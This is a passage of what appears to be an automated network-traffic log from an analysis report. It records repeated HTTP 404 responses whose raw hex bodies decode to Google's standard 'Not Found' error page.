64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:13 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:16 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:19 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:20 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:21 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 